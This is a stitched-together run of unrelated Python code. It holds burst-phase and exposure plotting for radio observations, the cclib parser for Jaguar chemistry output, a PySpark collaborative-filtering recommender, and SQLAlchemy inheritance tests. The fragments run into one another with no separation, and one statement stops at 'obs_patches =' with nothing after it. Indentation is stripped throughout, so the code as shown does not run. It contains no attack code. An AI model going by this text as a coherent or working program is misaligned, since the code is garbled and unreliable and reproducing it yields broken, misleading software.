burst_dict, fmin_dict, fmax_dict, fcen_dict = open_csv(data_file)
burst_per_phase_dict = {}
phase_lst = []
for i,k in enumerate(burst_dict.keys()):
print("phase list", k, len(burst_dict[k]))
phase_lst.append(list(get_phase(np.array(burst_dict[k]), period,
ref_mjd=ref_mjd)))
burst_per_phase_dict[k], _ = np.histogram(phase_lst[-1],
bins=nbins, range=(0,1))
phase_tot = [p for l in phase_lst for p in l]
phase_tot.sort()
burst_tot, _ = np.histogram(phase_tot, bins=nbins, range=(0,1))
# DEFINING COLORS
cm = plt.cm.get_cmap('Spectral_r')
# burst_hist_colors = {}
burst_hist_colors = []
for i,k in enumerate(burst_dict.keys()):
freq = np.log10(fcen_dict[k])
col = (np.log10(max_freq)-freq)/(np.log10(max_freq)-np.log10(min_freq))
# freq = fcen_dict[k]
# col = (max_freq-freq)/(max_freq-min_freq))
color = cm(col)
# burst_hist_colors[k] = color
burst_hist_colors.append(color)
# PLOTTING
fig, ax1 = plt.subplots(1, 1, sharex=True, figsize=(9,7))
yhist,xhist,_ = ax1.hist(phase_lst, bins=nbins, range=(0,1), stacked=True,
density=False, label=burst_dict.keys(),
edgecolor='black', linewidth=0.5, color=burst_hist_colors)
ax1.set_ylabel('N. Bursts')
ax1.set_xlim(0,1)
ax1.set_ylim(0, int(yhist[-1].max()*1.1))
ax1.legend(loc=2)
if save:
print('Plot saved: ./burst_obs_phase_hist.png')
plt.savefig('./burst_obs_phase_hist.png', pad_inches=0,
bbox_inches='tight', dpi=200)
plt.savefig('./burst_obs_phase_hist.pdf', pad_inches=0,
bbox_inches='tight', dpi=200)
if show:
plt.show()
def make_obstime_plot(data_file, period, ref_mjd=58369.30, save=False,
show=False, max_freq=2500, min_freq=200):
"""
Generates observation exposure plot
:param data_file: json file with data
:param period: period to use for phase calculation
:param ref_mjd: reference MJD to use
:param save: to save the plot
:param show: to show the plot
"""
burst_dict, snr_dict, obs_duration_dict, obs_startmjds_dict, fmin_dict, fmax_dict, fcen_dict = open_json(data_file)
# Defining duty cycle
frequency_hours = '%fH' % (24 * period)
t = Time(ref_mjd, format='mjd')
t0 = t+((period/2)*u.day)
    tf = Time(datetime.datetime.now())  # wrap in astropy Time so the while-loop comparison stays between Time objects
t0_low = t+((period/2)*u.day) - (0.16 * period * u.day)
t0_high = t+((period/2)*u.day) + (0.16 * period * u.day)
df_period = [t0]
df_duty_low = [t0_low]
df_duty_high = [t0_high]
t_activity, t_low, t_high = t0, t0_low, t0_high
while t_activity < tf:
        # step forward one period; the explicit u.day keeps the astropy Time arithmetic well-defined
        t_activity += period * u.day
        t_low += period * u.day
        t_high += period * u.day
df_period.append(t_activity)
df_duty_low.append(t_low)
df_duty_high.append(t_high)
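    # i.e. each predicted activity window is centred half a period after ref_mjd and
    # spans +/- 16% of the period; the 0.16 duty-cycle fraction is a hard-coded
    # assumption of this script, not something derived from the data.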
n_periods = len(df_period)
# DEFINING COLORS
cm = plt.cm.get_cmap('Spectral_r')
burst_hist_colors = []
obs_hist_colors = {}
for i,k in enumerate(obs_duration_dict.keys()):
freq = np.log10(fcen_dict[k])
col = (np.log10(max_freq)-freq)/(np.log10(max_freq)-np.log10(min_freq))
# c = i/len(obs_duration_dict.keys())
color = cm(col)
# if k in burst_dict.keys():
# burst_hist_colors.append(color)
obs_hist_colors[k] = color
# PLOTTING
fig = plt.figure(figsize=(7,7))
gs = gridspec.GridSpec(2,1, wspace=0.01, height_ratios=[3,1])
ax1 = fig.add_subplot(gs[0, 0]) #ax[0]
for i,k in enumerate(burst_dict.keys()):
ax1.scatter(burst_dict[k], snr_dict[k],
color=obs_hist_colors[k], label=k, marker='o', edgecolor='k',
linewidth=0.5, zorder=10, s=12)
max_snr = max([m for k in snr_dict.keys()
for m in snr_dict[k]])*1.1
ax1.set_ylim(0, max_snr)
ax1.set_ylabel('SNR')
ax2 = fig.add_subplot(gs[1, 0], sharex=ax1) #ax[1]
for i, k in enumerate(obs_duration_dict.keys()):
#d = duration_per_phase_dict[k]
# ax.scatter(obs_startmjds_dict[k],
# [fcen_dict[k] for i in range(len(obs_startmjds_dict[k]))],
# color=obs_hist_colors[i])
        obs_patches =
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020, the cclib development team
#
# This file is part of cclib (http://cclib.github.io) and is distributed under
# the terms of the BSD 3-Clause License.
"""Parser for Jaguar output files"""
import re
import numpy
from cclib.parser import logfileparser
from cclib.parser import utils
class Jaguar(logfileparser.Logfile):
"""A Jaguar output file"""
def __init__(self, *args, **kwargs):
# Call the __init__ method of the superclass
super(Jaguar, self).__init__(logname="Jaguar", *args, **kwargs)
def __str__(self):
"""Return a string representation of the object."""
return "Jaguar output file %s" % (self.filename)
def __repr__(self):
"""Return a representation of the object."""
return 'Jaguar("%s")' % (self.filename)
def normalisesym(self, label):
"""Normalise the symmetries used by Jaguar.
To normalise, three rules need to be applied:
(1) To handle orbitals of E symmetry, retain everything before the /
(2) Replace two p's by "
        (3) Replace any remaining single p's by '
"""
ans = label.split("/")[0].replace("pp", '"').replace("p", "'")
return ans
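        # Illustrative behaviour on hypothetical labels:
        #   normalisesym("A1p")    -> "A1'"
        #   normalisesym("A1pp")   -> 'A1"'
        #   normalisesym("E1p/ss") -> "E1'"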
def before_parsing(self):
# We need to track whether we are inside geometry optimization in order
# to parse SCF targets/values correctly.
self.geoopt = False
def after_parsing(self):
# This is to make sure we always have optdone after geometry optimizations,
# even if it is to be empty for unconverged runs. We have yet to test this
# with a regression for Jaguar, though.
if self.geoopt and not hasattr(self, 'optdone'):
self.optdone = []
def extract(self, inputfile, line):
"""Extract information from the file object inputfile."""
# Extract the package version number.
if "Jaguar version" in line:
tokens = line.split()
base_version = tokens[3][:-1]
package_version = "{}+{}".format(base_version, tokens[5])
self.metadata["package_version"] = package_version
self.metadata["legacy_package_version"] = base_version
# Extract the basis set name
if line[2:12] == "basis set:":
self.metadata["basis_set"] = line.split()[2]
# Extract charge and multiplicity
if line[2:22] == "net molecular charge":
self.set_attribute('charge', int(line.split()[-1]))
self.set_attribute('mult', int(next(inputfile).split()[-1]))
# The Gaussian basis set information is printed before the geometry, and we need
# to do some indexing to get this into cclib format, because fn increments
        # for each angular momentum, but cclib does not (we have just P instead of
        # all three X/Y/Z with the same parameters). On the other hand, fn enumerates
# the atomic orbitals correctly, so use it to build atombasis.
#
# Gaussian basis set information
#
# renorm mfac*renorm
# atom fn prim L z coef coef coef
# -------- ----- ---- --- ------------- ----------- ----------- -----------
# C1 1 1 S 7.161684E+01 1.5433E-01 2.7078E+00 2.7078E+00
# C1 1 2 S 1.304510E+01 5.3533E-01 2.6189E+00 2.6189E+00
# ...
# C1 3 6 X 2.941249E+00 2.2135E-01 1.2153E+00 1.2153E+00
# 4 Y 1.2153E+00
# 5 Z 1.2153E+00
# C1 2 8 S 2.222899E-01 1.0000E+00 2.3073E-01 2.3073E-01
# C1 3 7 X 6.834831E-01 8.6271E-01 7.6421E-01 7.6421E-01
# ...
# C2 6 1 S 7.161684E+01 1.5433E-01 2.7078E+00 2.7078E+00
# ...
#
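        # A rough sketch (not from a real run) of what the excerpt above would yield:
        # atombasis[0] would hold the 0-based AO indices of C1, e.g. [0, 1, 2, 3, 4]
        # (in order of appearance), while gbasis[0] would look roughly like
        # [('S', [[71.61684, 0.15433], [13.04510, 0.53533], ...]),
        #  ('P', [[2.941249, 0.22135], ...])] with [exponent, coefficient] pairs
        # per contracted shell.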
if line.strip() == "Gaussian basis set information":
self.skip_lines(inputfile, ['b', 'renorm', 'header', 'd'])
# This is probably the only place we can get this information from Jaguar.
self.gbasis = []
atombasis = []
line = next(inputfile)
fn_per_atom = []
while line.strip():
if len(line.split()) > 3:
aname = line.split()[0]
fn = int(line.split()[1])
prim = int(line.split()[2])
L = line.split()[3]
z = float(line.split()[4])
coef = float(line.split()[5])
# The primitive count is reset for each atom, so use that for adding
# new elements to atombasis and gbasis. We could also probably do this
# using the atom name, although that perhaps might not always be unique.
if prim == 1:
atombasis.append([])
fn_per_atom = []
self.gbasis.append([])
# Remember that fn is repeated when functions are contracted.
if not fn-1 in atombasis[-1]:
atombasis[-1].append(fn-1)
# Here we use fn only to know when a new contraction is encountered,
# so we don't need to decrement it, and we don't even use all values.
# What's more, since we only wish to save the parameters for each subshell
# once, we don't even need to consider lines for orbitals other than
# those for X*, making things a bit easier.
if not fn in fn_per_atom:
fn_per_atom.append(fn)
label = {'S': 'S', 'X': 'P', 'XX': 'D', 'XXX': 'F'}[L]
self.gbasis[-1].append((label, []))
igbasis = fn_per_atom.index(fn)
self.gbasis[-1][igbasis][1].append([z, coef])
else:
fn = int(line.split()[0])
L = line.split()[1]
# Some AO indices are only printed in these lines, for L > 0.
if not fn-1 in atombasis[-1]:
atombasis[-1].append(fn-1)
line = next(inputfile)
# The indices for atombasis can also be read later from the molecular orbital output.
self.set_attribute('atombasis', atombasis)
# This length of atombasis should always be the number of atoms.
self.set_attribute('natom', len(self.atombasis))
# Effective Core Potential
#
# Atom Electrons represented by ECP
# Mo 36
# Maximum angular term 3
# F Potential 1/r^n Exponent Coefficient
# ----- -------- -----------
# 0 140.4577691 -0.0469492
# 1 89.4739342 -24.9754989
# ...
# S-F Potential 1/r^n Exponent Coefficient
# ----- -------- -----------
# 0 33.7771969 2.9278406
# 1 10.0120020 34.3483716
# ...
# O 0
# Cl 10
# Maximum angular term 2
# D Potential 1/r^n Exponent Coefficient
# ----- -------- -----------
# 1 94.8130000 -10.0000000
# ...
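        # If the excerpt above were the whole ECP block, the loop below would leave
        # coreelectrons == [36, 0, 10] (Mo, O, Cl): only the two-token "atom count"
        # lines are consumed, everything else in the block is skipped.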
if line.strip() == "Effective Core Potential":
self.skip_line(inputfile, 'blank')
line = next(inputfile)
assert line.split()[0] == "Atom"
assert " ".join(line.split()[1:]) == "Electrons represented by ECP"
self.coreelectrons = []
line = next(inputfile)
while line.strip():
if len(line.split()) == 2:
self.coreelectrons.append(int(line.split()[1]))
line = next(inputfile)
if line[2:14] == "new geometry" or line[1:21] == "Symmetrized geometry" or line.find("Input geometry") > 0:
# Get the atom coordinates
if not hasattr(self, "atomcoords") or line[1:21] == "Symmetrized geometry":
# Wipe the "Input geometry" if "Symmetrized geometry" present
self.atomcoords = []
p = re.compile(r"(\D+)\d+") # One/more letters followed by a number
atomcoords = []
atomnos = []
angstrom = next(inputfile)
title = next(inputfile)
line = next(inputfile)
while line.strip():
temp = line.split()
element = p.findall(temp[0])[0]
atomnos.append(self.table.number[element])
atomcoords.append(list(map(float, temp[1:])))
line = next(inputfile)
self.atomcoords.append(atomcoords)
self.atomnos = numpy.array(atomnos, "i")
self.set_attribute('natom', len(atomcoords))
# Hartree-Fock energy after SCF
if line[1:18] == "SCFE: SCF energy:":
self.metadata["methods"].append("HF")
if not hasattr(self, "scfenergies"):
self.scfenergies = []
temp = line.strip().split()
scfenergy = float(temp[temp.index("hartrees") - 1])
scfenergy = utils.convertor(scfenergy, "hartree", "eV")
self.scfenergies.append(scfenergy)
# Energy after LMP2 correction
if line[1:18] == "Total LMP2 Energy":
self.metadata["methods"].append("LMP2")
if not hasattr(self, "mpenergies"):
self.mpenergies = [[]]
lmp2energy = float(line.split()[-1])
lmp2energy = utils.convertor(lmp2energy, "hartree", "eV")
self.mpenergies[-1].append(lmp2energy)
if line[15:45] == "Geometry optimization complete":
if not hasattr(self, 'optdone'):
self.optdone = []
self.optdone.append(len(self.geovalues) - 1)
if line.find("number of occupied orbitals") > 0:
# Get number of MOs
occs = int(line.split()[-1])
line = next(inputfile)
virts = int(line.split()[-1])
self.nmo = occs + virts
self.homos = numpy.array([occs-1], "i")
self.unrestrictedflag = False
if line[1:28] == "number of occupied orbitals":
self.homos = numpy.array([float(line.strip().split()[-1])-1], "i")
if line[2:27] == "number of basis functions":
nbasis = int(line.strip().split()[-1])
self.set_attribute('nbasis', nbasis)
if line.find("number of alpha occupied orb") > 0:
# Get number of MOs for an unrestricted calc
aoccs = int(line.split()[-1])
line = next(inputfile)
avirts = int(line.split()[-1])
line = next(inputfile)
boccs = int(line.split()[-1])
line = next(inputfile)
bvirt = int(line.split()[-1])
self.nmo = aoccs + avirts
self.homos = numpy.array([aoccs-1, boccs-1], "i")
self.unrestrictedflag = True
if line[0:4] == "etot":
# Get SCF convergence information
if not hasattr(self, "scfvalues"):
self.scfvalues = []
self.scftargets = [[5E-5, 5E-6]]
values = []
while line[0:4] == "etot":
# Jaguar 4.2
# etot 1 N N 0 N -382.08751886450 2.3E-03 1.4E-01
# etot 2 Y Y 0 N -382.27486023153 1.9E-01 1.4E-03 5.7E-02
# Jaguar 6.5
# etot 1 N N 0 N -382.08751881733 2.3E-03 1.4E-01
# etot 2 Y Y 0 N -382.27486018708 1.9E-01 1.4E-03 5.7E-02
temp = line.split()[7:]
if len(temp) == 3:
denergy = float(temp[0])
else:
denergy = 0 # Should really be greater than target value
# or should we just ignore the values in this line
ddensity = float(temp[-2])
maxdiiserr = float(temp[-1])
if not self.geoopt:
values.append([denergy, ddensity])
else:
values.append([ddensity])
try:
line = next(inputfile)
except StopIteration:
self.logger.warning('File terminated before end of last SCF! Last error: {}'.format(maxdiiserr))
break
self.scfvalues.append(values)
# MO energies and symmetries.
# Jaguar 7.0: provides energies and symmetries for both
# restricted and unrestricted calculations, like this:
        # Alpha
<filename>src/algorithms/cf.py<gh_stars>100-1000
import numpy as np
from src.algorithms import recommender_helpers as rechelp
from pyspark.sql.types import *
from pyspark.mllib.recommendation import ALS
from pyspark.mllib.regression import LabeledPoint
from pyspark.mllib.classification import NaiveBayes
from operator import add
from sklearn.metrics.pairwise import cosine_similarity
def calc_cf_mllib(y_training_data, num_partitions = 20):
"""
Utilizes the ALS collaborative filtering algorithm in MLLib to determine the predicted ratings
Args:
y_training_data: the data used to train the RecSys algorithm in the format of an RDD of [ (userId, itemId, actualRating) ]
Returns:
predicted: predicted ratings in the format of a RDD of [ (userId, itemId, predictedRating) ].
"""
#Predicted values can be anywhere - because we are normalizing the content based algorithms we should likely normalize here
max_rating = y_training_data.map(lambda (user, item, rating): rating).max()
min_rating = y_training_data.map(lambda (user, item, rating): rating).min()
if max_rating == min_rating:
min_rating=0
    #MLlib has two methods, train() and trainImplicit(). Implicit data will go between zero and 1
if min_rating==0 and max_rating==1:
model = ALS.trainImplicit(y_training_data, rank = 10, iterations = 5)
else:
model = ALS.train(y_training_data, rank = 10, iterations = 5)
#predict all user, item pairs
item_ids = y_training_data.map(lambda (u,i,r): i).distinct()
user_ids = y_training_data.map(lambda (u,i,r): u).distinct()
user_item_combo = user_ids.cartesian(item_ids).coalesce(num_partitions)
predicted = model.predictAll(user_item_combo.map(lambda x: (x[0], x[1])))
norm_predictions = predicted.map(lambda (user,item,pred): (user,item, rechelp.squish_preds(pred,min_rating,max_rating)))
return norm_predictions
def calc_user_user_cf(training_data, sqlCtx, num_partitions=20):
"""
A very simple user-user CF algorithm in PySpark. Method is less stable than calc_user_user_cf2
    Method derived from the Coursera course: Recommender Systems taught by Prof <NAME> (University of Minnesota)
and Prof <NAME> (Texas State University)
Args:
y_training_data: the data used to train the RecSys algorithm in the format of an RDD of [ (userId, itemId, actualRating) ]
Returns:
predicted: predicted ratings in the format of a RDD of [ (userId, itemId, predictedRating) ].
"""
user_groups = training_data.groupBy(lambda (user, item, rating): user)
user_groups_sim = user_groups.cartesian(user_groups).map(lambda ((user1_id, user1_rows), (user2_id, user2_rows)):\
(user1_id, user2_id, similarity(user1_rows, user2_rows, 1))).coalesce(num_partitions)
fields = [StructField("user1", LongType(),True),StructField("user2", LongType(), True),\
StructField("similarity", FloatType(), True) ]
schema_sim = StructType(fields)
user_sim = sqlCtx.createDataFrame(user_groups_sim, schema_sim)
user_sim.registerTempTable("user_sim")
fields = [StructField("user", LongType(),True),StructField("item", LongType(), True),\
StructField("rating", FloatType(), True) ]
schema = StructType(fields)
user_sim_sql = sqlCtx.createDataFrame(training_data, schema)
user_sim_sql.registerTempTable("ratings")
avg_ratings = sqlCtx.sql("select user, avg(rating) as avg_rating from ratings group by user")
avg_ratings.registerTempTable("averages")
residual_ratings = sqlCtx.sql("select r.user, r.item, (r.rating-a.avg_rating) as resids from ratings r, \
averages a where a.user=r.user")
residual_ratings.registerTempTable("residuals")
user_sim_resids = sqlCtx.sql("select u.user2, r.user, r.item, r.resids, similarity, r.resids*similarity as r_w from residuals r, \
user_sim u where r.user=u.user1")
user_sim_resids.registerTempTable("user_sim_resids")
item_adjusts = sqlCtx.sql("select user2, item, sum(r_w)/sum(abs(similarity)) as item_adj from user_sim_resids group by user2, item")
item_adjusts.registerTempTable("item_adjusts")
predictions = sqlCtx.sql("select user2 as user, item, (avg_rating +item_adj) as pred_rating \
from item_adjusts i, averages a where a.user=i.user2")
return predictions
def calc_user_user_cf2(training_data, num_partitions=20):
"""
A very simple user-user CF algorithm in PySpark. Method is more stable than calc_user_user_cf
    Method derived from the Coursera course: Recommender Systems taught by Prof <NAME> (University of Minnesota)
and Prof <NAME> (Texas State University)
Args:
y_training_data: the data used to train the RecSys algorithm in the format of an RDD of [ (userId, itemId, actualRating) ]
Returns:
predicted: predicted ratings in the format of a RDD of [ (userId, itemId, predictedRating) ].
"""
user_groups = training_data.groupBy(lambda (user, item, rating): user)
user_groups_sim = user_groups.cartesian(user_groups).map(lambda ((user1_id, user1_rows), (user2_id, user2_rows)):\
(user1_id, user2_id, similarity(user1_rows, user2_rows, 1))).coalesce(num_partitions)
user_averages = training_data.map(lambda (user, item, rating): (user, (rating))).groupByKey().\
map(lambda (user, ratings): (user, np.mean(list(ratings))))
user_resids = training_data.map(lambda (user, item, rating): (user, (item, rating))).join(user_averages)\
.map(lambda (user, ((item, rating), avg_rating)): (user, (item, rating-avg_rating)))
item_adjustments = user_resids.join(user_groups_sim.map(lambda (u1, u2, sim): (u1, (u2, sim))))\
.map(lambda (u1, ((item, resid), (u2, sim))): ((u2,item), (resid*sim, sim))).\
groupByKey().map(lambda ((user, item), sim_list): (user, item, calc_item_adjust(sim_list)))
predictions = item_adjustments.map(lambda (user, item, item_adj): (user, (item, item_adj))).join(user_averages)\
.map(lambda (user, ((item, item_adj), (avg_rate))): (user, item, avg_rate+item_adj))
#Predicted values can be anywhere - because we are normalizing the content based algorithms we should likely normalize here
max_rating = training_data.map(lambda (user, item, rating): rating).max()
min_rating = training_data.map(lambda (user, item, rating): rating).min()
if max_rating == min_rating:
min_rating=0
norm_predictions = predictions.map(lambda (user,item,pred): (user,item, rechelp.squish_preds(pred,min_rating,max_rating)))
return norm_predictions
def calc_item_adjust(sim_resids):
    #data coming into this function is a list of [residual*similarity, similarity] for all user, item pairs
#we want to output sum(residual*similarity)/sum(abs(similarity))
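    # worked example with made-up numbers: [(0.5*0.8, 0.8), (-0.2*0.5, 0.5)]
    # -> (0.4 - 0.1) / (0.8 + 0.5) = 0.3 / 1.3 ~ 0.23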
sum_r_w = 0
sum_sim = 0
for s in sim_resids:
sum_r_w += s[0]
sum_sim += abs(s[1])
if sum_sim ==0:
return 0
else:
return sum_r_w/float(sum_sim)
def calc_item_item_cf(training_data, num_partitions):
"""
A very simple item-item CF algorithm in PySpark.
    Method derived from the Coursera course: Recommender Systems taught by Prof <NAME> (University of Minnesota)
and Prof <NAME> (Texas State University)
Args:
y_training_data: the data used to train the RecSys algorithm in the format of an RDD of [ (userId, itemId, actualRating) ]
Returns:
predicted: predicted ratings in the format of a RDD of [ (userId, itemId, predictedRating) ].
"""
item_groups = training_data.groupBy(lambda (user, item, rating): item)
item_similarity = item_groups.cartesian(item_groups).map(lambda ((item1_id, item1_rows), (item2_id, item2_rows)):\
(item1_id, item2_id, similarity(item1_rows, item2_rows, 0))).coalesce(num_partitions)
user_item_sim = training_data.keyBy(lambda (user, item, rating): item)\
.join(item_similarity.keyBy(lambda (item1, item2, sim): item1))\
.map(lambda (item_id,((user, item, rating),(item1, item2, sim))):((user, item2), (item,rating,sim)))\
.filter(lambda ((user, item2), (item,rating,sim)): item2!=item)
predictions = user_item_sim.groupByKey()\
.map(lambda ((user, item), rows): (user, item, get_item_prob(rows)))
#Predicted values can be anywhere - because we are normalizing the content based algorithms we should likely normalize here
max_rating = training_data.map(lambda (user, item, rating): rating).max()
min_rating = training_data.map(lambda (user, item, rating): rating).min()
if max_rating == min_rating:
min_rating=0
norm_predictions = predictions.map(lambda (user,item,pred): (user,item, rechelp.squish_preds(pred,min_rating,max_rating)))
return norm_predictions
def similarity(item1_rows, item2_rows, index):
    # to determine user similarity, pass index=1 (rows are matched on the shared item)
    # to determine item similarity, pass index=0 (rows are matched on the shared user)
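    # e.g. (made-up ratings) two groups sharing two matches rated (4, 5) and (2, 1)
    # reduce to the cosine of the paired rating vectors [4, 2] and [5, 1], ~ 0.96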
rating_match = []
for i in item1_rows:
for j in item2_rows:
if i[index]==j[index]:
rating_match.append((i[2],j[2]))
if len(rating_match)==0:
sim = 0.0
else:
sim = cosine_similarity(*zip(*rating_match))[0][0]
return float(sim)
def get_item_prob(rows):
nom = 0
denom = 0
for r in rows:
nom += r[1]*r[2]
denom += abs(r[2])
if denom ==0:
return 0
else:
item_prob = nom/float(denom)
return float(item_prob)
def calc_naive_bayes_using_pyspark(training_data, num_partitions=20):
"""
Determine the predicted rating of every user-item combination using MLlib's Naive Bayes algorithm.
Args:
training_data: the data used to train the RecSys algorithm in the format of a RDD of [ (userId, itemId, actualRating) ]
Returns:
predictions: predicted ratings of every user-item combination in the format of a RDD of [(userId, itemId, predictedRating)].
"""
# to use MLlib's Naive Bayes model, it requires the input to be in a format of a LabeledPoint
# therefore, convert dataset so that it will in the format [(rating, (user, item))]
r_ui_train = training_data.map(lambda (u,i,r): LabeledPoint(r, (u, i)))
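    # e.g. (illustrative) the triple (7, 42, 3.0) becomes LabeledPoint(3.0, (7, 42)):
    # the rating is the label, (user, item) are the features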
# train Naive Bayes model
naiveBayesModel = NaiveBayes.train(r_ui_train, lambda_=1.0)
# predict on all user-item pairs
user_ids = training_data.map(lambda (u,i,r): u).distinct()
item_ids = training_data.map(lambda (u,i,r): i).distinct()
ui_combo = user_ids.cartesian(item_ids).coalesce(num_partitions)
    r_ui_combo = ui_combo.map(lambda (u,i): LabeledPoint(1, (u, i)))  # dummy label; only the (user, item) features matter here
# make prediction
predictions = r_ui_combo.map(lambda p: (p.features[0], p.features[1], naiveBayesModel.predict(p.features)))
return predictions
def calc_naive_bayes_components(training_data, sc, num_partitions=20):
"""
Helper function that will compute the necessary components needed by:
calc_naive_bayes_map(), calc_naive_bayes_mse(), calc_naive_bayes_mae()
Args:
training_data: the data used to train the RecSys algorithm in the format of a RDD of [ (userId, itemId, actualRating) ]
sc: spark context
Returns:
        ui_allBayesProb: all Bayes probabilities for each user-item pair, in the format [((userId, itemId), (rating, bayesProbability))]
"""
# create RDD for range of ratings, ie. [1, 2, 3, 4, 5] for ratings 1-5
min_rating = training_data.map(lambda (u,i,r): r).min()
max_rating = training_data.map(lambda (u,i,r): r).max()
range_of_ratings = sc.broadcast(list(range(int(min_rating), int(max_rating + 1))))
#predict on all user-item pairs
user_ids = training_data.map(lambda (u,i,r): u).distinct()
item_ids = training_data.map(lambda (u,i,r): i).distinct()
ui_combo = user_ids.cartesian(item_ids).coalesce(num_partitions)
# since we have to determine the probability of rating r for each user and item,
# we have to create a RDD with [(rating, (user, item))] for each rating
# ie. [(rating_1, (user, item)), (rating_2, (user, item)), (rating_3, (user, item)), ..., (rating_5, (user, item))]
# do not combine rCombo_ui into uirCombo since rCombo_ui will be used later on
rCombo_ui = ui_combo.flatMap(lambda (u,i): [(float(r), (u, i)) for r in range_of_ratings.value]).coalesce(num_partitions)
uirCombo = rCombo_ui.map(lambda (r, (u,i)): (u, i, r))
"""
Calculate P(r|u), probability of rating r for user u.
P(r|u) = (number of ratings r that user u gives) / (total number of ratings that user u gives)
For example, if rating r == 1, then
    P(r|u)
        # ...the moment so do some heuristics to find it.
parent_mapper = inspect(Parent)
for prop in parent_mapper.column_attrs:
if not prop.instrument:
break
else:
prop = parent_mapper._columntoproperty[
parent_mapper.polymorphic_on
]
# then make sure the column we will query on matches.
is_(parent_mapper.polymorphic_on, prop.columns[0])
if set_event:
@event.listens_for(Parent, "init", propagate=True)
def set_identity(instance, *arg, **kw):
ident = object_mapper(instance).polymorphic_identity
if ident == "parent":
instance.x = parent_ident
elif ident == "child":
instance.x = child_ident
else:
assert False, "Got unexpected identity %r" % ident
s = Session(testing.db)
s.add_all([Parent(q="p1"), Child(q="c1", y="c1"), Parent(q="p2")])
s.commit()
s.close()
eq_(
[type(t) for t in s.query(Parent).order_by(Parent.id)],
[Parent, Child, Parent],
)
eq_([type(t) for t in s.query(Child).all()], [Child])
class SortOnlyOnImportantFKsTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table(
"a",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column(
"b_id",
Integer,
ForeignKey("b.id", use_alter=True, name="b_fk"),
),
)
Table(
"b",
metadata,
Column("id", Integer, ForeignKey("a.id"), primary_key=True),
)
@classmethod
def setup_classes(cls):
Base = declarative_base()
class A(Base):
__tablename__ = "a"
id = Column(
Integer, primary_key=True, test_needs_autoincrement=True
)
b_id = Column(Integer, ForeignKey("b.id"))
class B(A):
__tablename__ = "b"
id = Column(Integer, ForeignKey("a.id"), primary_key=True)
__mapper_args__ = {"inherit_condition": id == A.id}
cls.classes.A = A
cls.classes.B = B
def test_flush(self):
s = Session(testing.db)
s.add(self.classes.B())
s.flush()
class FalseDiscriminatorTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
global t1
t1 = Table(
"t1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("type", Boolean, nullable=False),
)
def test_false_on_sub(self):
class Foo(object):
pass
class Bar(Foo):
pass
mapper(Foo, t1, polymorphic_on=t1.c.type, polymorphic_identity=True)
mapper(Bar, inherits=Foo, polymorphic_identity=False)
sess = create_session()
b1 = Bar()
sess.add(b1)
sess.flush()
assert b1.type is False
sess.expunge_all()
assert isinstance(sess.query(Foo).one(), Bar)
def test_false_on_base(self):
class Ding(object):
pass
class Bat(Ding):
pass
mapper(Ding, t1, polymorphic_on=t1.c.type, polymorphic_identity=False)
mapper(Bat, inherits=Ding, polymorphic_identity=True)
sess = create_session()
d1 = Ding()
sess.add(d1)
sess.flush()
assert d1.type is False
sess.expunge_all()
assert sess.query(Ding).one() is not None
class PolymorphicSynonymTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
global t1, t2
t1 = Table(
"t1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("type", String(10), nullable=False),
Column("info", String(255)),
)
t2 = Table(
"t2",
metadata,
Column("id", Integer, ForeignKey("t1.id"), primary_key=True),
Column("data", String(10), nullable=False),
)
def test_polymorphic_synonym(self):
class T1(fixtures.ComparableEntity):
def info(self):
return "THE INFO IS:" + self._info
def _set_info(self, x):
self._info = x
info = property(info, _set_info)
class T2(T1):
pass
mapper(
T1,
t1,
polymorphic_on=t1.c.type,
polymorphic_identity="t1",
properties={"info": synonym("_info", map_column=True)},
)
mapper(T2, t2, inherits=T1, polymorphic_identity="t2")
sess = create_session()
at1 = T1(info="at1")
at2 = T2(info="at2", data="t2 data")
sess.add(at1)
sess.add(at2)
sess.flush()
sess.expunge_all()
eq_(sess.query(T2).filter(T2.info == "at2").one(), at2)
eq_(at2.info, "THE INFO IS:at2")
class PolymorphicAttributeManagementTest(fixtures.MappedTest):
"""Test polymorphic_on can be assigned, can be mirrored, etc."""
run_setup_mappers = "once"
@classmethod
def define_tables(cls, metadata):
Table(
"table_a",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("class_name", String(50)),
)
Table(
"table_b",
metadata,
Column("id", Integer, ForeignKey("table_a.id"), primary_key=True),
Column("class_name", String(50)),
)
Table(
"table_c",
metadata,
Column("id", Integer, ForeignKey("table_b.id"), primary_key=True),
Column("data", String(10)),
)
@classmethod
def setup_classes(cls):
table_b, table_c, table_a = (
cls.tables.table_b,
cls.tables.table_c,
cls.tables.table_a,
)
class A(cls.Basic):
pass
class B(A):
pass
class C(B):
pass
class D(B):
pass
mapper(
A,
table_a,
polymorphic_on=table_a.c.class_name,
polymorphic_identity="a",
)
mapper(
B,
table_b,
inherits=A,
polymorphic_on=table_b.c.class_name,
polymorphic_identity="b",
properties=dict(
class_name=[table_a.c.class_name, table_b.c.class_name]
),
)
mapper(C, table_c, inherits=B, polymorphic_identity="c")
mapper(D, inherits=B, polymorphic_identity="d")
def test_poly_configured_immediate(self):
A, C, B = (self.classes.A, self.classes.C, self.classes.B)
a = A()
b = B()
c = C()
eq_(a.class_name, "a")
eq_(b.class_name, "b")
eq_(c.class_name, "c")
def test_base_class(self):
A, C, B = (self.classes.A, self.classes.C, self.classes.B)
sess = Session()
c1 = C()
sess.add(c1)
sess.commit()
assert isinstance(sess.query(B).first(), C)
sess.close()
assert isinstance(sess.query(A).first(), C)
def test_valid_assignment_upwards(self):
"""test that we can assign 'd' to a B, since B/D
both involve the same set of tables.
"""
D, B = self.classes.D, self.classes.B
sess = Session()
b1 = B()
b1.class_name = "d"
sess.add(b1)
sess.commit()
sess.close()
assert isinstance(sess.query(B).first(), D)
def test_invalid_assignment_downwards(self):
"""test that we warn on assign of 'b' to a C, since this adds
a row to the C table we'd never load.
"""
C = self.classes.C
sess = Session()
c1 = C()
c1.class_name = "b"
sess.add(c1)
assert_raises_message(
sa_exc.SAWarning,
"Flushing object %s with incompatible "
"polymorphic identity 'b'; the object may not "
"refresh and/or load correctly" % instance_str(c1),
sess.flush,
)
def test_invalid_assignment_upwards(self):
"""test that we warn on assign of 'c' to a B, since we will have a
